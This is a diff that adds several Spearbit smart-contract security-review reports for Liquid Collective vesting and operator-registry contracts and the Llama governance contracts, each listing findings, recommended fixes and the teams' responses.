• RedeemManager.1.sol#L157-L158 • Withdraw.1.sol#L42-L43 • CoverageFund.1.sol#L46-L49 Description: pullCoverageFunds makes sure that the amount sending to River is non-zero before calling its corresponding endpoint. This behavior differs from the implementations of • pullELFees • pullExceedingEth • pullEth 33 Not checking for a non-zero value has the added benefit of saving gas when the value is non-zero, while the check for a non-zero value before calling back River saves gas for cases when the amount could be 0. Recommendation: It would be best to keep the implementation of these 4 pulling mechanisms consistent by either having or excluding the non-zero amount check. Liquid Collective: Fixed in commit 01078a. Spearbit: Verified. 
34 diff --git a/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review-Sept.txt b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review-Sept.txt new file mode 100644 index 0000000..a758d44 --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review-Sept.txt @@ -0,0 +1,12 @@ +5.1.1 Schedule amounts cannot be revoked or released Severity: Low Risk Context: L434, ERC20VestableVotesUpgradeable.1.sol#L303-L306 TLC_globalUnlockScheduleMigration.sol#L62-L72, ERC20VestableVotesUpgradeable.1.sol#L432- Description: The migration for schedule ids 9 to 12 has the following parameters: // 9 -> 12 migrations[3] = VestingScheduleMigration({ scheduleCount: 4, newStart: 0, newEnd: 1656626400, newLockDuration: 72403200, setCliff: true, setDuration: true, setPeriodDuration: true, ignoreGlobalUnlock: false }); The current start is 7/1/2022 0:00:00 and the updated/migrated end value would be 6/30/2022 22:00:00, this will cause _computeVestedAmount(...) to always return 0 where one is calculating the released amount due to capping the time by the end timestamp. And thus tokens would not be able to be released. Also these tokens cannot be revoked since the set [start, end] where end < start would be empty. Recommendation: Perhaps we should make sure that the new end timestamp is at least start + cliffDuration + delta (for partial release) or start + duration (for full release). Liquid Collective: Fixed in commit b66cc8. Spearbit: Fixed in commit b66cc8 by ensuring that end = start + duration. +5.1.2 A revoked schedule might be able to be fully released before the 2 year global lock period Severity: Low Risk Context: ERC20VestableVotesUpgradeable.1.sol#L410-L412, ERC20VestableVotesUpgradeable.1.sol#L458 Description: The unlockedAmount calculated in _computeGlobalUnlocked(...) is based on the original sched- uledAmount. If a creator revokes its revocable vesting schedule and change the end time to a new earlier date, this formula does not use the new effective amount (the total vested amount at the new end date). And so one might be able to release the vested tokens before 2 years after the lock period. Recommendation: If it is required for a beneficiary to only be able to release the effective total vested amount (even after revoking) after 2 years from the lock end date, the logic in _releaseVestingSchedule(_index) needs to be updated to take into consideration the updated effective vested amount at the end of the schedule and not the original schedule amount. Liquid Collective: Client confirms this is the expected behavior. Spearbit: Acknowledged. 4 +5.1.3 Unlock date of certain vesting schedules does not meet the requirement Severity: Low Risk Context: TLC_globalUnlockScheduleMigration.sol#L359 Description: All vesting schedules should have the unlock date (start + lockDuration) set to 16/10/2024 0:00 GMT+0 post-migration. The following is the list of vesting schedules whose unlock date does not meet the requirement post-migration: Index Unlock Date 19,21,23 16/10/2024 9:00 GMT+0 36-60 16/10/2024 22:00 GMT+0 Recommendation: Update the affected vesting schedules to ensure that the unlock date is set to 16/10/2024 0:00 GMT+0 after the migration. Liquid Collective: Fixed in commit 340d9f. Spearbit: Fixed in commit 340d9f by implementing the auditor's recommendation to update the unlock date of the affected vesting schedules to 16/10/2024 0:00 GMT+0 post-migration. 
+5.1.4 ERC20VestableVotesUpgradeableV1._computeVestingReleasableAmount: Users VestingSchedule.releasedAmount > globalUnlocked will be temporarily denied of service with Severity: Low Risk Context: ERC20VestableVotesUpgradeable.1.sol#L413 Description: The current version of the code introduces a new concept; global unlocking. The idea is that wher- ever IgnoreGlobalUnlockSchedule is set to false, the releasable amount will be the minimum value between the original vesting schedule releasable amount and the global unlocking releasable amount (the constant rate of VestingSchedule.amount / 24 for each month starting at the end of the locking period). The implementa- tion ,however, consists of an accounting error caused by a wrong implicit assumption that during the execution of _computeVestingReleasableAmount globalUnlocked should not be less than releasedAmount. In reality, how- In that case globalUnlocked - ever, this state is possible for users that had already claimed vested tokens. releasedAmount will revert for an underflow causing a delay in the vesting schedule which in the worst case may last for two years. Originally this issue was meant to be classified as medium risk but since the team stated that with the current deployment, no tokens will be released whatsoever until the upcoming upgrade of the TLC contract, we decided to classify this issue as low risk instead. Recommendation: Assuming that the intended functionality is that the 1/24 of the total vesting schedule amount should be releasable every month starting from the end of the locking period, regardless of previous claims, then you may want to consider the following proposal for the _computeVestingReleasableAmount function. Note that _vestingSchedule.maxLeftToBeClaimed should be initialized to _vestingSchedule.amount - _vestingSched- ule.releasedAmount as part of the migration script. 5 function _computeVestingReleasableAmount( VestingSchedulesV2.VestingSchedule storage _vestingSchedule, uint256 _time, uint256 _index ) internal view returns (uint256) { uint256 releasedAmount = _vestingSchedule.releasedAmount; uint256 vestedAmount = _computeVestedAmount(_vestingSchedule, _time > _vestingSchedule.end ? _vestingSchedule.end : ,! _time); if (vestedAmount > releasedAmount) { if (!IgnoreGlobalUnlockSchedule.get(_index)) { uint256 globalUnlocked = _computeGlobalUnlocked( _vestingSchedule.amount, _time - (_vestingSchedule.start + ,! _vestingSchedule.lockDuration) ); if(_vestingSchedule.amountAcc < _vestingSchedule.maxLeftToBeClaimed){ globalUnlocked = LibUint256.min(globalUnlocked, _vestingSchedule.maxLeftToBeClaimed); uint256 amount = LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - ,! _vestingSchedule.amountAcc); _vestingSchedule.amountAcc += amount; return amount; } return LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - releasedAmount); } unchecked { return vestedAmount - releasedAmount; } } return 0; } Please make sure to test this function thoroughly before deployment. intended functionality, consider adding a custom error for the described underflow and revert. In case the described issue is part of the Liquid Collective: Fixed in commit 9d7cdb. Spearbit: Fixed in commit 9d7cdb by implementing the auditor's recommendation to add a custom error for the described underflow. 
+5.1.5 TlcMigration.migrate: Missing input validation Severity: Low Risk Context: TLC_globalUnlockScheduleMigration.sol#L365-L386 Description: The upcoming change in some of the vesting schedules is going to be executed via the migrate function which at the current version of the code is missing necessary validation checks to make sure no erroneous values are inserted. Recommendation: Consider adding the following post-effects validation checks: 1. Make sure that VestingSchedule.cliffDuration can not be longer than the total duration (VestingSchedule.duration). 2. VestingSchedule.end should ule.cliffDuration + delta ule.duration (for full release). (for not be partial less release) than or VestingSchedule.start + VestingSched- VestingSchedule.start + VestingSched- 3. Make sure that all vesting schedules have the unlock date VestingSchedule.start + VestingSched- ule.lockDuration set to 16/10/2024 0:00 GMT+0. 6 Liquid Collective: Fixed in commit 340d9f and commit 4f63c4. Spearbit: Fixed in commit 340d9f and commit 4f63c4 by implementing the auditor's recommendations. 5.2 Gas Optimization +5.2.1 Optimise the release amount calculation Severity: Gas Optimization Context: ERC20VestableVotesUpgradeable.1.sol#L413 Description: In the presence of a global lock schedule one calculates the release amount as: LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - releasedAmount) Recommendation: We can avoid one subtraction by moving the releasedAmount out of the min function: LibUint256.min(vestedAmount, globalUnlocked) - releasedAmount Note also that LibUint256.min(vestedAmount, globalUnlocked) represent the total amount of vested tokens that could have been released at the current timestamp. Liquid Collective: Fixed in commit 0e8d82. Spearbit: Fixed in commit 0e8d82. +5.2.2 Use msg.sender whenever possible Severity: Gas Optimization Context: ERC20VestableVotesUpgradeable.1.sol#L383 ERC20VestableVotesUpgradeable.1.sol#L319, ERC20VestableVotesUpgradeable.1.sol#L356, Description: checked to be equal to msg.sender: In this context the parameters vestingSchedule.{creator, beneficiary} have already been if (msg.sender != vestingSchedule.X) { revert LibErrors.Unauthorized(msg.sender); } Recommendation: It would be cheaper to avoid reading from storage vestingSchedule.{creator, benefi- ciary} and use msg.sender in this context. It might also make sense to change all occurrences of msg.sender to _msgSender(). Liquid Collective: Fixed in commit e852d5. Spearbit: Fixed in commit e852d5. 7 5.3 Informational +5.3.1 Test function testMigrate uses outdated values for assertion Severity: Informational Context: TLC_globalUnlockScheduleMigration.t.sol#L60-L108 Description: In commit fbcc4ddd6da325d60eda113c2b0e910aa8492b88, the newLockDuration values were up- dated in TLC_globalUnlockScheduleMigration.sol. However, the testMigrate function was not updated ac- cordingly and still compares schedule.lockDuration to the outdated newLockDuration values, resulting in failing assertions. Recommendation: Update the values being asserted to schedule.lockDuration in the testMigrate function to match the updated newLockDuration values, ensuring the test is up to date and the assertions pass. Liquid Collective: Fixed in PR 232. Spearbit: Acknowledged. 
+5.3.2 Rounding Error in Unlocked Token Amount Calculation at ERC20VestableVotesUpgradea- ble.1.sol#L458 Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L458 Description: There is a rounding error in calculating the unlocked amount, which may lead to minor discrepancies in the tokens available for release. Recommendation: To avoid this rounding error, you can change the formula from: uint256 unlockedAmount = (scheduledAmount / 24) * (timeSinceLocalLockEnd / (365 days / 12)); to: uint256 unlockedAmount = (scheduledAmount * timeSinceLocalLockEnd) / (24 * (365 days / 12)); Liquid Collective: The rounding error is wanted, we don't want to unlock the token linearly but in blocks of 1/24th every month. Spearbit: Acknowledged +5.3.3 It might take longer than 2 years to release all the vested schedule amount after the lock period ends Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L413 Description: It is possible that in the presence of the global lock, releasing the total vested value might take longer than 2 years if the lockDuration + 2 years is comparatively small when compared to duration (or start - end). We just know that after 2 years all the scheduled amount can be released but only a portion of it might have been vested. Recommendation: If this an expected behaviour it might be useful to at least add a comment mentioning this issue. Liquid Collective: A comment has been added in commit 3dc76b. Spearbit: A comment has been added in commit 3dc76b. 8 +5.3.4 _computeVestingReleasableAmount's_time input parameter can be removed/inlined Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L122-L127, ERC20VestableVotesUpgradeable.1.sol#L341- L348, ERC20VestableVotesUpgradeable.1.sol#L400-L404 Description: At both call sites to _computeVestingReleasableAmount(...), time is _getCurrentTime(). Recommendation: One can remove the _time input parameter from _computeVestingReleasableAmount and instead inline _getCurrentTime() in its implementation (unless the devs plan to use this internal function with times other than _getCurrentTime()). Moreover, we can refactor the time validity just before the calls to _computeVestingReleasableAmount(...) and move them into that function by passing a flag to _computeVestingReleasableAmount(...): function _computeVestingReleasableAmount( VestingSchedulesV2.VestingSchedule memory _vestingSchedule, bool revokeInvalidTime, uint256 _index ) internal view returns (uint256) { uint256 time = _getCurrentTime(); if (time < (vestingSchedule.start + vestingSchedule.lockDuration)) { if(revokeInvalidTime) { // before lock no tokens can be vested revert VestingScheduleIsLocked(); } else { return 0; } } ... } Liquid Collective: Fixed in commit 42058b. Spearbit: Fixed in commit 42058b. +5.3.5 Comments and NatSpec Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L441 ERC20VestableVotesUpgradeable.1.sol#L343, ERC20VestableVotesUpgradeable.1.sol#L396-L404, Description/Recommendation: ERC20VestableVotesUpgradeable.1.sol#L343, Might be more accurate to say: - // before lock no tokens can be vested + during the locked period no vested tokens can be released by the beneficiary ERC20VestableVotesUpgradeable.1.sol#L396-L404, missing natspec: @param _index ERC20VestableVotesUpgradeable.1.sol#L441, typo completly should be completely Liquid Collective: Fixed in commit 1470cd. Spearbit: Fixed in commit 1470cd. 
9 diff --git a/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review.txt new file mode 100644 index 0000000..431f2a0 --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review.txt @@ -0,0 +1,4 @@ +5.1.1 Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unsolicited exits can happen at the end of _setStoppedValidatorCounts(...) Severity: Informational Context: • OperatorsRegistry.1.sol#L541-L546 • OperatorsRegistry.1.sol#L569-L574 Description: Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unso- licited exits can happen at the end of _setStoppedValidatorCounts(...) to avoid extra operations like taking minimum per iteration of the loops. Note that: an = an(cid:0)1 (cid:0) min(an(cid:0)1, bn) ) an = a0 (cid:0) min(a0, n X i=1 bn) = max(0, a0 (cid:0) n X i=1 bn) Recommendation: Calculate the sum of all unsolicited exits and then add that to TotalValidatorExitsRe- quested and use the above formula to calculate CurrentValidatorExitsDemand at after the 2 for loops. Liquid Collective: Fixed in 86d45e72e83de8ead43b8b5f85fa583d64599330. Spearbit: Fixed. +5.1.2 Define a new internal function to update TotalValidatorExitsRequested Severity: Informational Context: • OperatorsRegistry.1.sol#L584-L585 • OperatorsRegistry.1.sol#L848-L849 Description/Recommendation: quested and emitting the relevant event by introducing the new internal function: It would be best to refactor the logic of updating TotalValidatorExitsRe- function _setTotalValidatorExitsRequested(uint256 _currentValue, uint256 _newValue) internal { TotalValidatorExitsRequested.set(_newValue); emit SetTotalValidatorExitsRequested(_currentValue, _newValue); } Liquid Collective: Fixed in 18fa86eb117431bb2526d0708a359226fde6678a. Spearbit: Fixed. 4 +5.1.3 use _setCurrentValidatorExitsDemand Severity: Informational Context: • OperatorsRegistry.1.sol#L467 • OperatorsRegistry.1.sol#L589-L592 Description: If an update is needed for CurrentValidatorExitsDemand in _setStoppedValidatorCounts(...), the internal function _setCurrentValidatorExitsDemand is not used. Recommendation: Make sure _setCurrentValidatorExitsDemand is used whenever an update for Current- ValidatorExitsDemand is required Liquid Collective: Fixed in b39846d23642f833246d0d335c4ad2930ecb515e. Spearbit: Fixed. +5.1.4 Changes to the emission of RequestedValidatorExits event during catch-up Severity: Informational Context: • OperatorsRegistry.1.sol#L488 • OperatorsRegistry.1.sol#L546 Description: The event log will be different between the old and new implementations. In the old implementation, the latest RequestedValidatorExits event in the logs will always contain the most up-to-date count of requested exits (count) of an operator after a "catch-up" attempt. This is because a new RequestedValidatorExits event with the up-to-date currentStoppedCount is emitted at the end of the async requestValidatorExits function call. However, in the new implementation, the latest RequestedValidatorExits event in the logs contains the outdated or previous count of an operator after a "catch-up" attempt since a new RequestedValidatorExits event is not emitted at the end of the Oracle reporting transaction. 
If any off-chain component depends on the latest RequestedValidatorExits event in the logs to determine the count of requested exits (count), it might potentially cause the off-chain component to read and process outdated information. For instance, an operator's off-chain component might be reading the count within the latest Request- edValidatorExits event in the logs and comparing it against its internal counter to decide if more validators need to be exited. The following shows the discrepancy between the events emitted between the old and new implementations. Catch-up implementation in the previous design 1) Catch-up was carried out async when someone called the requestValidatorExits > _pickNextValida- torsToExitFromActiveOperators function 2) Within the _pickNextValidatorsToExitFromActiveOperators function. Assume an operator called opera It will attempt to "catch-up" by and its currentRequestedExits is less than the currentStoppedCount. performing the following actions: 1) Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2) Let x be the no. of validator count to "catch-up" (x = currentStoppedCount (cid:0) currentRequestedExits) 3) opera.picked will be incremented by x. Since opera.picked has not been initialized yet, opera.picked = x 3) Assume that the opera is neither the operator with the highest validation count nor the operator with the second highest. As such, opera is not "picked" to exit its validators 5 4) Near the end of the _pickNextValidatorsToExitFromActiveOperators function, it will loop through all op- erators that have operator .picked > 0 and perform some actions. The following actions will be performed against opera since opera.picked > 0: 1) Emit RequestedValidatorExits(opera, currentStoppedCount) event 2) Set opera.requestedExits = currentStoppedCount. 5) After the transaction, two events were emitted for opera to indicate a catch-up had been attempted. • UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) • RequestedValidatorExits(opera, currentStoppedCount) Catch-up implementation in the new design 1. Catch-up was carried out within the _setStoppedValidatorCounts function during Oracle reporting. 2. Let _stoppedValidatorCounts[idx] be the currentStoppedCount AND operators.requestedExits be currentRequestedExits 3. Assume an operator called opera and its currentRequestedExits is less than the currentStoppedCount. It will attempt to "catch-up" by performing the following actions: 1. Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2. Set opera.requestedExits = currentStoppedCount. 4. After the transaction, only one event was emitted for opera to indicate a catch-up had been attempted. • UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) In addition, as per the comment below, it was understood that unsolicited exits are considered as if exit requests were performed for them. In this case, the latest RequestedValidatorExits event in the logs should reflect the most up-to-date count of exit requests for an operator including unsolicited exits at any time. File: OperatorsRegistry.1.sol 573: ,! 574: ,! 
+5.1.2 Define a new internal function to update TotalValidatorExitsRequested
Severity: Informational
Context:
• OperatorsRegistry.1.sol#L584-L585
• OperatorsRegistry.1.sol#L848-L849
Description/Recommendation: It would be best to refactor the logic of updating TotalValidatorExitsRequested and emitting the relevant event by introducing the new internal function:

    function _setTotalValidatorExitsRequested(uint256 _currentValue, uint256 _newValue) internal {
        TotalValidatorExitsRequested.set(_newValue);
        emit SetTotalValidatorExitsRequested(_currentValue, _newValue);
    }

Liquid Collective: Fixed in 18fa86eb117431bb2526d0708a359226fde6678a.
Spearbit: Fixed.

+5.1.3 Use _setCurrentValidatorExitsDemand
Severity: Informational
Context:
• OperatorsRegistry.1.sol#L467
• OperatorsRegistry.1.sol#L589-L592
Description: When an update is needed for CurrentValidatorExitsDemand in _setStoppedValidatorCounts(...), the internal function _setCurrentValidatorExitsDemand is not used.
Recommendation: Make sure _setCurrentValidatorExitsDemand is used whenever an update of CurrentValidatorExitsDemand is required.
Liquid Collective: Fixed in b39846d23642f833246d0d335c4ad2930ecb515e.
Spearbit: Fixed.

+5.1.4 Changes to the emission of the RequestedValidatorExits event during catch-up
Severity: Informational
Context:
• OperatorsRegistry.1.sol#L488
• OperatorsRegistry.1.sol#L546
Description: The event log will differ between the old and new implementations. In the old implementation, the latest RequestedValidatorExits event in the logs will always contain the most up-to-date count of requested exits (count) of an operator after a "catch-up" attempt. This is because a new RequestedValidatorExits event with the up-to-date currentStoppedCount is emitted at the end of the async requestValidatorExits function call. However, in the new implementation, the latest RequestedValidatorExits event in the logs contains the outdated or previous count of an operator after a "catch-up" attempt, since a new RequestedValidatorExits event is not emitted at the end of the Oracle reporting transaction.
If any off-chain component depends on the latest RequestedValidatorExits event in the logs to determine the count of requested exits (count), it might potentially cause the off-chain component to read and process outdated information. For instance, an operator's off-chain component might be reading the count within the latest RequestedValidatorExits event in the logs and comparing it against its internal counter to decide if more validators need to be exited. The following shows the discrepancy between the events emitted by the old and new implementations.
Catch-up implementation in the previous design:
1) Catch-up was carried out asynchronously when someone called the requestValidatorExits > _pickNextValidatorsToExitFromActiveOperators function.
2) Within the _pickNextValidatorsToExitFromActiveOperators function, assume an operator called opera whose currentRequestedExits is less than the currentStoppedCount. It will attempt to "catch up" by performing the following actions:
   1) Emit the UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event.
   2) Let x be the number of validators to "catch up" (x = currentStoppedCount - currentRequestedExits).
   3) opera.picked will be incremented by x. Since opera.picked has not been initialized yet, opera.picked = x.
3) Assume that opera is neither the operator with the highest validation count nor the operator with the second highest. As such, opera is not "picked" to exit its validators.
4) Near the end of the _pickNextValidatorsToExitFromActiveOperators function, it will loop through all operators that have operator.picked > 0 and perform some actions. The following actions will be performed against opera since opera.picked > 0:
   1) Emit the RequestedValidatorExits(opera, currentStoppedCount) event.
   2) Set opera.requestedExits = currentStoppedCount.
5) After the transaction, two events were emitted for opera to indicate a catch-up had been attempted:
• UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount)
• RequestedValidatorExits(opera, currentStoppedCount)
Catch-up implementation in the new design:
1. Catch-up is carried out within the _setStoppedValidatorCounts function during Oracle reporting.
2. Let _stoppedValidatorCounts[idx] be the currentStoppedCount and operators.requestedExits be currentRequestedExits.
3. Assume an operator called opera whose currentRequestedExits is less than the currentStoppedCount. It will attempt to "catch up" by performing the following actions:
   1. Emit the UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event.
   2. Set opera.requestedExits = currentStoppedCount.
4. After the transaction, only one event was emitted for opera to indicate a catch-up had been attempted:
• UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount)
In addition, as per the comment below, it was understood that unsolicited exits are considered as if exit requests were performed for them. In this case, the latest RequestedValidatorExits event in the logs should reflect the most up-to-date count of exit requests for an operator, including unsolicited exits, at any time.

    File: OperatorsRegistry.1.sol
    573: // we decrease the demand, considering unsollicited exits as if the exit requests were performed for them
    574: vars.currentValidatorExitsDemand -= LibUint256.min(unsollicitedExits, vars.currentValidatorExitsDemand);

Recommendation: Consider updating the implementation to ensure that the latest RequestedValidatorExits event in the logs contains the most up-to-date count of exit requests for an operator, including unsolicited exits, at any time.
Liquid Collective: We indeed considered that emitting RequestedValidatorExits on catch-up could confuse Node Operators, because we are not requesting them to exit. So what we can consider is:
• RequestedValidatorExits is always emitted to signal to a NO to perform the action of exiting 1 or more validator keys.
• UpdatedRequestedValidatorExitsUponStopped is emitted so indexers/off-chain systems can update requested values, but does not signal NOs.
Spearbit: Acknowledged.

diff --git a/findings_newupdate/spearbit/Llama-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Llama-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..7e063fa
--- /dev/null
+++ b/findings_newupdate/spearbit/Llama-Spearbit-Security-Review.txt
@@ -0,0 +1,43 @@
+5.1.1 The castApprovalBySig and castDisapprovalBySig functions can revert
Severity: Critical Risk
Context: LlamaCore.sol#L683-L685
Description: The castApprovalBySig and castDisapprovalBySig functions are used to cast an approval or disapproval via an off-chain signature. Within _preCastAssertions a check is performed against the strategy using msg.sender instead of policyholder; the strategy (e.g. AbsoluteStrategy) uses that argument to check if the cast sender is a policyholder:

    isApproval
        ? actionInfo.strategy.isApprovalEnabled(actionInfo, msg.sender)
        : actionInfo.strategy.isDisapprovalEnabled(actionInfo, msg.sender);

While this works for a normal cast, using the signature-based variants will fail, as the sender can be anyone who calls the method with the signature signed off-chain.
Recommendation: Consider sending the policyholder instead of msg.sender.
Llama: Fixed in commit 4bb184 and PR 285.
Spearbit: Resolved.

+5.1.2 The castApproval/castDisapproval doesn't check if the role parameter is the approvalRole
Severity: Critical Risk
Context: LlamaCore.sol#L642
Description: A policyholder should be able to cast their approval for an action if they have the approvalRole defined in the strategy. It should not be possible for other roles to cast an approval. The _castApproval method verifies that the policyholder has the role passed as an argument, but doesn't check if it actually is the approvalRole, which is the role eligible to cast an approval. This means any role in the Llama contract can participate in the approval with completely different quantities (weights). The same problem occurs for the castDisapproval function as well.
Recommendation: The check could be added inside the strategy in the getApprovalQuantityAt function (RelativeStrategy.sol#L174):

    function getApprovalQuantityAt(address policyholder, uint8 role, uint256 timestamp) external view returns (uint128) {
    +   if (role != approvalRole) return 0;
        uint128 quantity = policy.getPastQuantity(policyholder, role, timestamp);
        return quantity > 0 && forceApprovalRole[role] ? type(uint128).max : quantity;
    }

If the passed role doesn't equal the approvalRole, a quantity of zero is returned:

    if (role != approvalRole) return 0;

Llama: Fixed in commit 38b5a9.
Spearbit: Resolved.
5.2 High Risk

+5.2.1 Reducing the quantity of a policyholder results in an increase instead of a decrease in totalQuantity
Severity: High Risk
Context: LlamaPolicy.sol#L388
Description: In Llama, policyholders can approve or disapprove actions. Each policyholder has a quantity which represents their approval casting power. It is possible to update the quantity of an individual policyholder with the setRoleHolder function in the LlamaPolicy. The _setRoleHolder method does not handle a decrease of quantity correctly for totalQuantity. The totalQuantity describes the sum of the quantities of the individual policyholders for a specific role. In the case of a quantity change, the difference is calculated as follows:

    uint128 quantityDiff = initialQuantity > quantity ? initialQuantity - quantity : quantity - initialQuantity;

However, the quantityDiff is always added instead of being subtracted when the quantity is reduced. This results in incorrect tracking of the totalQuantity. Adding the quantityDiff should only happen in the increase case. See LlamaPolicy.sol#L388:

    // case: willHaveRole=true, hadRoleQuantity=true
    newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff;

Recommendation: The increase and decrease cases of quantity should be handled in separate if-conditions, or by using a signed int variable for calculating the difference.
Decrease:

    if (hadRoleQuantity && willHaveRole && initialQuantity > quantity) {
        newTotalQuantity = currentRoleSupply.totalQuantity - quantityDiff;
    }

Increase:

    if (hadRoleQuantity && willHaveRole && initialQuantity < quantity) {
        newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff;
    }

Llama: Resolved by commit eb90d2 and PR 291.
Spearbit: Resolved.

5.3 Medium Risk

+5.3.1 LlamaPolicy.revokePolicy cannot be called repeatedly and may result in burned tokens retaining active roles
Severity: Medium Risk
Context: LlamaPolicy.sol#L199
Description: Llama has two distinct revokePolicy functions. The first revokePolicy function removes all roles of a policyholder and burns the associated token. This function iterates over all existing roles, regardless of whether the policyholder still holds the role; in the next step the token is burned. If the total number of roles becomes too high, this transaction might not fit into one block. A second version of the revokePolicy function allows users to pass an array of roles to be removed. This approach should enable the function to be called multiple times, thus avoiding an out-of-gas error. An out-of-gas error is currently not very likely considering the maximum possible role number of 255. However, the method exists and could be called with a subset of the roles of a policyholder. The method contains the following check:

    if (balanceOf(policyholder) == 0) revert AddressDoesNotHoldPolicy(policyholder);

Therefore, it is not possible to call the method multiple times. The result of a call with a subset of roles would lead to an inconsistent state: the token of the policyholder is burned, but the policyholder could still use the remaining roles in Llama. Important methods like LlamaPolicy.hasRole don't check whether the token has been burned (see LlamaPolicy.sol#L250).
Recommendation: Add a separate method revokePolicyWithoutBurn which only revokes the roles. This method can be provided as part of a Llama script. The script could check numRoles and split the call into multiple revokePolicyWithoutBurn calls, ensuring each role will be revoked. In the last call the token should be burned.
Llama: Resolved by commit ad0391 and PR 294.
Spearbit: Resolved.

+5.3.2 Role, permission, strategy, and guard management or config errors may prevent creating/approving/queuing/executing actions
Severity: Medium Risk
Context:
Creating
• LlamaCore.sol#L492
• LlamaCore.sol#L583 Policyholder check
• LlamaCore.sol#L589 Strategy validateActionCreation
• LlamaCore.sol#L592 Guard check
Approving
• LlamaCore.sol#L492
• LlamaCore.sol#L544-L552 getActionState's calls to the strategy
• LlamaCore.sol#L680 Policyholder check
Queuing
• LlamaCore.sol#L492
• LlamaCore.sol#L544-L552 getActionState's calls to the strategy
• LlamaCore.sol#L283 Getting minExecutionTime for queuing
Executing
• LlamaCore.sol#L492
• LlamaCore.sol#L544-L552 getActionState's calls to the strategy
• LlamaCore.sol#L303 Pre-execution guard
• LlamaCore.sol#L346 Post-execution guard
Description: LlamaCore deployment from the factory will only succeed if one of the roles is the BOOTSTRAP_ROLE. As the comments note:

    // There must be at least one role holder with role ID of 1, since that role ID is initially
    // given permission to call `setRolePermission`. This is required to reduce the chance that an
    // instance is deployed with an invalid configuration that results in the instance being unusable.
    // Role ID 1 is referred to as the bootstrap role.

There are still several ways a user can misstep and lose access to LlamaCore.
• Bootstrap Role Scenarios: while the bootstrap role is still needed:
1. Setting an expiry on the bootstrap role's policyholder RoleHolderData and allowing the timestamp to pass. Once passed, any caller may remove the BOOTSTRAP_ROLE from expired policyholders.
2. Removing the BOOTSTRAP_ROLE from all policyholders.
3. Revoking the role's permission with setRolePermission(BOOTSTRAP_ROLE, bootstrapPermissionId, false).
• General Roles and Permissions: similarly, users may allow other permissions to expire, or remove/revoke them, which can leave the contract in a state where no permissions exist to interact with it. The BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem.
• Misconfigured Strategies: a misconfigured strategy may also result in the inability to process new actions. For example:
1. Setting minApprovals too high.
2. Setting queuingPeriod unreasonably high.
3. Calling revokePolicy when doing so would make policy.getRoleSupplyAsQuantitySum(approvalRole) fall below minApprovals (or fall below minApprovals - actionCreatorApprovalRoleQty).
4. Items 1 & 2 but applied to disapprovals. And more, depending on the strategy (e.g. if a strategy always responded true to isActive).
• Removal of Strategies: it should not be possible to remove the last strategy of a Llama instance, yet it is possible to remove all strategies from a Llama instance. It would not be possible to create a new action afterward, while an action is required to add other strategies back. As a result, the instance would become unusable, and access to funds locked in the Accounts would be lost.
• Misconfigured Guards: an accidentally overly aggressive guard could block all transactions. There is a built-in protection to prevent guards from getting in the way of basic management: if (target == address(this) || target == address(policy)) revert CannotUseCoreOrPolicy();. Again, the BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem.
Recommendation:
• Bootstrap Role: given the importance of the bootstrap role, and the factory-level enforcement of its existence, preventing it from expiring would prevent accidental loss of the role.
Recommendation: • Bootstrap Role Given the importance of the bootstrap role, and the factory-level enforcement of its exis- tence, preventing it from expiring would prevent accidental loss of the role. 8 In general, exercise extreme caution when removing or disabling this role. • General Roles and Permissions In addition to any potential code changes, documentation and UI should highlight the foot guns present when removing role permissions and roles from policyholders (i.e. care must be taken to ensure the remaining permissions/roles support the ongoing operation of LlamaCore). • Misconfigured Strategies Again, document and surface risks in UI at a minimum. Consider adding on-chain checks if ever possible to prevent strategies that are unable to create/approve/execute actions. • Removal of Strategies It should not be possible to remove the last strategy of a Llama instance Risk of removing strategies should be documented and surfaced in the UI, as even if one strategy remains, it may not be the strategy needed to support the remaining permissions. • Misconfigured Guards Similar to strategies, document and surface risks in UI at minimum. Consider adding on-chain checks if ever possible to prevent guards that are unable to create/approve/execute actions. Llama: We made all possible changes to accommodate these findings, not everything can be solved onchain but we will have offchain infrastructure to help prevent these situations. The changes that were performed: 1. Expect the bootstrap role to be at index 0 2. Require that it's expiration is type(uint64).max Spearbit: Acknowledged. +5.3.3 LlamaPolicy.hasRole doesn't check if a policyholder holds a token Severity: Medium Risk Context: LlamaPolicy.sol#L250 Description: Incorrect usage of the revokePolicy function can result in a case, where the token of a policyholder is already burned but still holds a role. The hasRole function doesn't check if in addition to the role the policyholder still holds the token to be active. The role could still be used in the Llama system. Recommendation: Add if (balanceOf(policyholder) == 0) return false to the hasRole function. Llama: Resolved by commit ad0391 and PR 294. Spearbit: Resolved. +5.3.4 Incorrect isActionApproved behavior if new policyholders get added after the createAction in the same block.timestamp Severity: Medium Risk Context: RelativeStrategy#L162 Description: Llama utilizes Checkpoints 